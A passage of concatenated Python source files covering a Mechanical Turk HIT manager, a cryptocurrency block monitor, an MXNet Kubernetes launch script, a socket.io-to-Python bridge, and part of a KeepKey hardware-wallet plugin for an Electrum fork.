'hits are added. This will be enforced in future versions.',
True
)
if self.opt['max_connections'] == 0:
mturk_page_url = self.create_additional_hits(
num_hits=self.required_hits,
qualifications=qualifications,
)
else:
mturk_page_url = self.create_additional_hits(
num_hits=min(self.required_hits, self.opt['max_connections']),
qualifications=qualifications,
)
shared_utils.print_and_log(logging.INFO,
'Link to HIT: {}\n'.format(mturk_page_url),
should_print=True)
shared_utils.print_and_log(
logging.INFO,
'Waiting for Turkers to respond... (Please don\'t close'
' your laptop or put your computer into sleep or standby mode.)\n',
should_print=True
)
self.task_state = self.STATE_HITS_MADE
return mturk_page_url
def get_hit(self, hit_id):
"""Get hit from mturk by hit_id"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
hit = client.get_hit(HITId=hit_id)
if self.db_logger is not None:
try:
self.db_logger.log_hit_status(hit)
except Exception:
pass
return hit
def get_assignment(self, assignment_id):
"""Gets assignment from mturk by assignment_id. Only works if the
assignment is in a completed state
"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
return client.get_assignment(AssignmentId=assignment_id)
def get_assignments_for_hit(self, hit_id):
"""Get completed assignments for a hit"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
assignments_info = client.list_assignments_for_hit(HITId=hit_id)
return assignments_info.get('Assignments', [])
def expire_all_unassigned_hits(self):
"""Move through the whole hit_id list and attempt to expire the
HITs, though this only immediately expires those that aren't assigned.
"""
# TODO note and mark assigned hits as ones to be expired later
shared_utils.print_and_log(logging.INFO,
'Expiring all unassigned HITs...',
should_print=not self.is_test)
completed_ids = self.worker_manager.get_complete_hits()
for hit_id in self.hit_id_list:
if hit_id not in completed_ids:
# TODO get confirmation that the HIT is acutally expired
mturk_utils.expire_hit(self.is_sandbox, hit_id)
def approve_work(self, assignment_id, override_rejection=False):
"""approve work for a given assignment through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.approve_assignment(
AssignmentId=assignment_id, OverrideRejection=override_rejection)
if self.db_logger is not None:
self.db_logger.log_approve_assignment(assignment_id)
shared_utils.print_and_log(
logging.INFO,
'Assignment {} approved.'
''.format(assignment_id),
)
def reject_work(self, assignment_id, reason):
"""reject work for a given assignment through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.reject_assignment(
AssignmentId=assignment_id,
RequesterFeedback=reason
)
if self.db_logger is not None:
self.db_logger.log_reject_assignment(assignment_id)
shared_utils.print_and_log(
logging.INFO,
'Assignment {} rejected for reason {}.'
''.format(assignment_id, reason),
)
def approve_assignments_for_hit(self, hit_id, override_rejection=False):
"""Approve work for assignments associated with a given hit, through
mturk client
"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
assignments = self.get_assignments_for_hit(hit_id)
for assignment in assignments:
assignment_id = assignment['AssignmentId']
client.approve_assignment(AssignmentId=assignment_id,
OverrideRejection=override_rejection)
def block_worker(self, worker_id, reason):
"""Block a worker by id using the mturk client, passes reason along"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.create_worker_block(WorkerId=worker_id, Reason=reason)
shared_utils.print_and_log(
logging.INFO,
'Worker {} blocked for reason {}.'
''.format(worker_id, reason),
)
def soft_block_worker(self, worker_id, qual='block_qualification'):
"""Soft block a worker by giving the worker the block qualification"""
qual_name = self.opt.get(qual, None)
assert qual_name is not None, ('No qualification {} has been specified'
'in opt'.format(qual))
self.give_worker_qualification(worker_id, qual_name)
def un_soft_block_worker(self, worker_id, qual='block_qualification'):
"""Remove a soft block from a worker by removing a block qualification
from the worker"""
qual_name = self.opt.get(qual, None)
assert qual_name is not None, ('No qualification {} has been specified'
'in opt'.format(qual))
self.remove_worker_qualification(worker_id, qual_name)
def give_worker_qualification(self, worker_id, qual_name, qual_value=None):
"""Give a worker a particular qualification"""
qual_id = mturk_utils.find_qualification(qual_name, self.is_sandbox)
if qual_id is False or qual_id is None:
shared_utils.print_and_log(
logging.WARN,
'Could not give worker {} qualification {}, as the '
'qualification could not be found to exist.'
''.format(worker_id, qual_name),
should_print=True
)
return
mturk_utils.give_worker_qualification(worker_id, qual_id, qual_value,
self.is_sandbox)
shared_utils.print_and_log(
logging.INFO,
'gave {} qualification {}'.format(worker_id, qual_name),
should_print=True
)
def remove_worker_qualification(self, worker_id, qual_name, reason=''):
"""Remove a qualification from a worker"""
qual_id = mturk_utils.find_qualification(qual_name, self.is_sandbox)
if qual_id is False or qual_id is None:
shared_utils.print_and_log(
logging.WARN,
'Could not remove from worker {} qualification {}, as the '
'qualification could not be found to exist.'
''.format(worker_id, qual_name),
should_print=True
)
return
try:
mturk_utils.remove_worker_qualification(worker_id, qual_id,
self.is_sandbox, reason)
shared_utils.print_and_log(
logging.INFO,
'removed {}\'s qualification {}'.format(worker_id, qual_name),
should_print=True
)
except Exception as e:
shared_utils.print_and_log(
logging.WARN if not self.has_time_limit else logging.INFO,
'removing {}\'s qualification {} failed with error {}. This '
'can be because the worker didn\'t have that qualification.'
''.format(worker_id, qual_name, repr(e)),
should_print=True
)
def create_qualification(self, qualification_name, description,
can_exist=True):
"""Create a new qualification. If can_exist is set, simply return
the ID of the existing qualification rather than throw an error
"""
if not can_exist:
qual_id = mturk_utils.find_qualification(qualification_name,
self.is_sandbox)
if qual_id is not None:
shared_utils.print_and_log(
logging.WARN,
'Could not create qualification {}, as it existed'
''.format(qualification_name),
should_print=True
)
return None
return mturk_utils.find_or_create_qualification(
qualification_name,
description,
self.is_sandbox
)
def pay_bonus(self, worker_id, bonus_amount, assignment_id, reason,
unique_request_token):
"""Handles paying bonus to a turker, fails for insufficient funds.
Returns True on success and False on failure
"""
total_cost = mturk_utils.calculate_mturk_cost(
payment_opt={'type': 'bonus', 'amount': bonus_amount}
)
if not mturk_utils.check_mturk_balance(balance_needed=total_cost,
is_sandbox=self.is_sandbox):
shared_utils.print_and_log(
logging.WARN,
'Cannot pay bonus. Reason: Insufficient '
'funds in your MTurk account.',
should_print=True
)
return False
client = mturk_utils.get_mturk_client(self.is_sandbox)
# unique_request_token may be useful for handling future network errors
client.send_bonus(
WorkerId=worker_id,
BonusAmount=str(bonus_amount),
AssignmentId=assignment_id,
Reason=reason,
UniqueRequestToken=unique_request_token
)
if self.db_logger is not None:
self.db_logger.log_pay_extra_bonus(
worker_id, assignment_id, bonus_amount, reason)
shared_utils.print_and_log(
logging.INFO,
'Paid ${} bonus to WorkerId: {}'.format(
bonus_amount,
worker_id
)
)
return True
def email_worker(self, worker_id, subject, message_text):
"""Send an email to a worker through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
response = client.notify_workers(
Subject=subject,
MessageText=message_text,
WorkerIds=[worker_id]
)
if len(response['NotifyWorkersFailureStatuses']) > 0:
failure_message = response['NotifyWorkersFailureStatuses'][0]
return {'failure': failure_message['NotifyWorkersFailureMessage']}
else:
return {'success': True}
|
monitor.py | #!/usr/bin/env python3
"""
This module specifies class Monitored designated for processing of cryptocurrencies blocks
"""
import threading
import logging
from timeit import default_timer as timer
from datetime import datetime, timedelta
from .coin import BTC, BCH, DASH, ZEC, LTC, ETH
from .database import Database
from .notifier import Notifier
logger = logging.getLogger(__name__)
class Monitor():
"""
Monitor controls the processing of cryptocurrencies bloks
"""
stop = threading.Event()
coins = []
threads = []
database = None
notifier = None
def __init__(self, config):
"""
Construct new Monitor object
:param config: configuration dict
"""
self.config = config
self.database = Database(config['db'], self.config)
self.notifier = Notifier(config, self.database)
for coin in config['coins']:
coin_inst = coin(config, self.stop)
coin_inst.db_id = self.database.get_coin(coin_inst.__class__.__name__)['id']
self.coins.append(coin_inst)
def shutdown(self, signum, frame):
"""
Terminate threads of each component
"""
logger.info('Shuting down')
self.stop.set()
for thread in self.threads:
thread.join()
self.notifier.process_remaining()
def test_connection(self):
"""
Test connectivity of all components
"""
self.notifier.test_connection()
for coin in self.coins:
if not coin.test_connection():
raise ConnectionError('{}: node unreachable'.format(coin.__class__.__name__))
def start(self):
"""
Start thread for every coin and notifier
"""
for coin in self.coins:
logger.info('%s: monitoring started', coin)
thread = threading.Thread(target=self.worker, args=(coin,))
self.threads.append(thread)
thread.start()
thread = threading.Thread(target=self.notifier.worker, args=(self.stop,))
self.threads.append(thread)
thread.start()
def set_last_blocks(self):
"""
Set the current block of each coin as the last processed
"""
for coin in self.coins:
number, block_hash = coin.get_last_block_number()
self.database.insert_block(coin, number, block_hash)
logger.info('%s: setting %s as last processed block', coin, number)
def process_block(self, database, coin, number):
"""
Process transaction of <coin> in a block of number <number>
:param database: Database object
:param coin: Coin object
:param number: block number
:return: number of the next block
"""
time_start = timer()
coin.get_block(number)
block_id = database.insert_block(coin, number, coin.get_block_hash())
logger.info('%s: processing block: %s', coin, number)
cnt = 0
for tx_hash in coin.get_block_transactions():
addresses = coin.get_transaction_io(tx_hash)
self.notifier.add_transaction(coin, number, block_id, tx_hash, addresses)
cnt += 1
time_total = timer() - time_start
logger.debug('%s: processed %d transactions in %.4fs', coin, cnt, time_total)
return number + 1
def last_processed_block(self, database, coin):
"""
Get the last block procesesd of <coin>
:param database: Database object
:param coin: Coin object
:return: number of last processed block
"""
number = database.get_last_block_number(coin)
while True:
hash_saved = database.get_block_hash(coin, number)
hash_node = coin.get_block_hash(number)
if hash_saved == hash_node or hash_saved is None:
break
database.delete_block(coin, number)
number -= 1
#print("last_processed_block> ", number)
return number
def worker(self, coin):
"""
Process new blocks of cryptocurrency <coin> until stop event is set.
:param coin: a class inherited from Coin
"""
database = Database(self.config['db'], self.config)
while not self.stop.is_set():
current_number = self.last_processed_block(database, coin) + 1
last_number, _ = coin.get_last_block_number()
#print(current_number, last_number)
while current_number <= last_number:
if self.stop.is_set():
break
try:
current_number = self.process_block(database, coin, current_number)
except InterruptedError:
break
until_next_block = (coin.get_block_creation_time() + coin.get_block_time() - datetime.now()).total_seconds()
if until_next_block < 0: # should be already generated
until_next_block = (coin.get_block_time() * 0.05).total_seconds() # wait only brief time (5% of block time) before trying again
self.stop.wait(timeout=until_next_block)
logger.info('%s: terminating', coin)
|
start.py | import sys
import os
import time
import requests
import socket
import subprocess
import threading
import logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s.%(msecs)03d %(levelname)s: %(message)s', datefmt="%Y-%m-%d %H:%M:%S")
ROLE = os.getenv("ROLE")
HOST_NAME = os.getenv("HOSTNAME") # exported by k8s
HOST_IP = socket.gethostbyname(HOST_NAME)
NUM_WORKER = os.getenv("DMLC_NUM_WORKER")
NUM_SERVER = os.getenv("DMLC_NUM_SERVER")
APISERVER = "http://10.28.1.1:8080"
API = "/api/v1/namespaces/"
NAMESPACE = "default"
JOB_SELECTOR = "labelSelector=name="
JOB_NAME = os.getenv("JOB_NAME") # export via env
PROG = os.getenv("PROG") # the python main file starting training
WORK_DIR = os.getenv("WORK_DIR")
BATCH_SIZE = os.getenv("BATCH_SIZE")
KV_STORE = os.getenv("KV_STORE")
'''
Get all pods of this job
'''
def get_podlist():
pod = API + NAMESPACE + "/pods?"
url = APISERVER + pod + JOB_SELECTOR + JOB_NAME
token_path = '/var/run/secrets/kubernetes.io/serviceaccount/token'
if os.path.isfile(token_path):
token = open(token_path, 'r').read()
bearer = "Bearer " + token
headers = {"Authorization": bearer}
return requests.get(url, headers=headers, verify=False).json()
else:
return requests.get(url,verify=False).json()
'''
check whether all pods are running
'''
def is_all_running(podlist):
require = len(podlist["items"])
running = 0
for pod in podlist["items"]:
if pod["status"]["phase"] == "Running":
running += 1
logging.info("waiting for pods running, require:" + str(require) + ", running:" + str(running))
if require == running:
return True
else:
return False
'''
get pod <ip, id> mapping
'''
def get_map(podlist):
global SCHEDULER_IP
IPs = []
for pod in podlist["items"]:
IPs.append(pod["status"]["podIP"])
IPs.sort()
SCHEDULER_IP = str(IPs[0])
map = {}
for i in range(len(IPs)):
map[IPs[i]] = i
return map
def start_scheduler(cmd, env):
logging.info("starting scheduler ...")
env['DMLC_ROLE'] = 'scheduler' # not in conflict with 'server' since they start in different time
scheduler = threading.Thread(target=(lambda: subprocess.check_call(cmd, env=env, shell=True)), args=())
scheduler.setDaemon(True)
scheduler.start()
def main():
global ROLE
logging.info("starting script ...")
# interprete command
cmd = "cd " + WORK_DIR + "../ && " + PROG
if BATCH_SIZE is not None and BATCH_SIZE != '':
cmd = cmd + " " + "--batch-size" + " " + BATCH_SIZE
if KV_STORE is not None and KV_STORE != '':
cmd = cmd + " " + "--kv-store" + " " + KV_STORE
logging.info("cmd: " + cmd)
env = os.environ.copy()
if 'dist' in KV_STORE:
logging.info("Distributed training: " + KV_STORE)
# check pod status
podlist = get_podlist()
logging.debug(str(podlist))
while not is_all_running(podlist):
time.sleep(1)
podlist = get_podlist()
map = get_map(podlist)
logging.info(str(map))
# the scheduler runs on the first node
SCHEDULER_PORT = "6060"
logging.info("scheduler IP: " + SCHEDULER_IP + ", scheduler port: " + SCHEDULER_PORT)
env['DMLC_PS_ROOT_URI'] = SCHEDULER_IP
env['DMLC_PS_ROOT_PORT'] = SCHEDULER_PORT
env['DMLC_NUM_WORKER'] = NUM_WORKER
env['DMLC_NUM_SERVER'] = NUM_SERVER
# env['PS_VERBOSE'] = '2'
logging.info("self role: " + ROLE + " self IP: " + HOST_IP)
if SCHEDULER_IP == HOST_IP:
logging.info("master: start initialization ...")
start_scheduler(cmd, env.copy())
# start ps/worker
if ROLE == "ps":
ROLE = "server"
env['DMLC_ROLE'] = ROLE
subprocess.check_call(cmd, env=env, shell=True)
logging.info("Task finished successfully!")
if __name__ == '__main__':
if len(sys.argv) != 1:
print "Description: MXNet start script in k8s cluster"
print "Usage: python start.py"
sys.exit(1)
main() |
socket_io.py | '''
A socket.io bridge for Python
This gives Python users access to socket.io, a node.js library. This library
provides simple and efficient bidirectional communication between browsers
and servers over a message-oriented socket. Transport is normalized over
various technologies including WebSockets, Flash sockets, and AJAX polling.
For the latest source, visit https://github.com/evanw/socket.io-python
'''
import os
import json
import atexit
import socket
import tempfile
import subprocess
import multiprocessing
tempfile.tempdir = os.getcwd()
# A socket.io template that connects to a Python socket over TCP and forwards
# messages as JSON strings separated by null characters. TCP was chosen over
# UDP to allow for arbitrarily large packets.
_js = '''
var net = require('net');
var io = require('socket.io').listen(%d);
io.set('log level', 1);
io.configure(function() {
io.set('authorization', function(handshakeData, callback) {
callback(null, true); // authorize client
});
});
// tcp connection to server
var tcp = net.createConnection(%d, 'localhost');
var buffer = '';
tcp.addListener('data', function(data) {
var i = 0;
while (i < data.length) {
if (data[i] == 0) {
sendToClient(JSON.parse(buffer + data.toString('utf8', 0, i)));
data = data.slice(i + 1);
buffer = '';
i = 0;
} else {
i++;
}
}
buffer += data.toString('utf8');
});
function sendToServer(client, command, data) {
data = JSON.stringify({
session: client.id,
command: command,
data: data,
address: client.handshake.address.address,
port: client.handshake.address.port
});
tcp.write(data + '\0');
}
function sendToClient(json) {
if (json.broadcast) {
io.sockets.send(json.data);
} else if (json.session in io.sockets.sockets) {
io.sockets.sockets[json.session].send(json.data);
}
}
io.sockets.on('connection', function(client) {
sendToServer(client, 'connect', null);
client.on('message', function(data) {
sendToServer(client, 'message', data);
});
client.on('disconnect', function() {
sendToServer(client, 'disconnect', null);
});
});
'''
class Client:
'''
Represents a client connection. Each client has these properties:
server - the Socket instance that owns this client
session - the session id used by node (a string of numbers)
address - the remote address of the client
port - the remote port of the client
'''
def __init__(self, server, session, address, port):
self.server = server
self.session = session
self.address = address
self.port = port
def send(self, data):
'''
Send a message to this client.
data - a string with the data to transmit
'''
self.server._send(data, { 'session': self.session })
def __str__(self):
'''
Returns "client-ADDRESS:PORT", where ADDRESS and PORT are the
remote address and port of the client.
'''
return '%s:%s' % (self.address, self.port)
class Server:
'''
This is a socket.io server, and is meant to be subclassed. A subclass
might look like this:
import socket_io as io
class Server(io.Server):
def on_connect(self, client):
print client, 'connected'
self.broadcast(str(client) + ' connected')
print 'there are now', len(self.clients), 'clients'
def on_message(self, client, message):
print client, 'sent', message
client.send(message)
def on_disconnect(self, client):
print client, 'disconnected'
self.broadcast(str(client) + ' disconnected')
print 'there are now', len(self.clients), 'clients'
Server().listen(5000)
The server has self.clients, a dictionary of client session ids to
Client instances.
'''
def __init__(self):
self.clients = {}
def _handle(self, info):
command = info['command']
session = info['session']
if command == 'connect':
self.clients[session] = Client(self, session, info['address'], info['port'])
self.on_connect(self.clients[session])
elif command == 'message':
if session in self.clients:
self.on_message(self.clients[session], info['data'])
elif command == 'disconnect':
if session in self.clients:
client = self.clients[session]
del self.clients[session]
self.on_disconnect(client)
def on_connect(self, client):
'''
Called after a client connects. Override this in a subclass to
be notified of connections.
client - a Client instance representing the connection
'''
pass
def on_message(self, client, data):
'''
Called when client sends a message. Override this in a subclass to
be notified of sent messages.
client - a Client instance representing the connection
data - a string with the transmitted data
'''
pass
def on_disconnect(self, client):
'''
Called after a client disconnects. Override this in a subclass to
be notified of disconnections.
client - a Client instance representing the connection
'''
pass
def broadcast(self, data):
'''
Send a message to all connected clients.
data - a string with the data to transmit
'''
self._send(data, { 'broadcast': True })
def listen(self, ws_port, py_port=None, fork=False):
'''
Run the server on the port given by ws_port. We actually need two
ports, an external one for the browser (ws_port) and an internal
one to communicate with node.js (py_port):
browser: node.js: this module:
--------- ---------------------- ---------------------
io.Socket <-> ws_port <-> TCP socket <-> py_port <-> io.Socket
ws_port - the port that the browser will connect to
py_port - the port that python will use to talk to node.js
(defaults to ws_port + 1)
'''
# set default port
if py_port is None:
py_port = ws_port + 1
# create a custom node.js script
js = _js % (ws_port, py_port)
handle, path = tempfile.mkstemp(suffix='.js')
os.write(handle, js)
os.close(handle)
# run that script in node.js
process = subprocess.Popen(['nodejs', path])
def cleanup():
process.kill()
os.remove(path)
atexit.register(cleanup)
# make sure we can communicate with node.js
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', py_port))
sock.listen(0)
sock, addr = sock.accept()
def send(data, info):
info['data'] = data
sock.send(json.dumps(info) + '\0')
self._send = send
def run():
# run the server
buffer = ''
while 1:
buffer += sock.recv(4096)
index = buffer.find('\0')
while index >= 0:
data, buffer = buffer[0:index], buffer[index+1:]
self._handle(json.loads(data))
index = buffer.find('\0')
if(fork):
p = multiprocessing.Process(target=run)
p.start()
def killprocess():
p.terminate()
atexit.register(killprocess)
else:
run()
|
keepkey.py | from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_vestx.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_vestx.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_vestx.bip32 import BIP32Node
from electrum_vestx import constants
from electrum_vestx.i18n import _
from electrum_vestx.transaction import deserialize, Transaction
from electrum_vestx.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_vestx.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
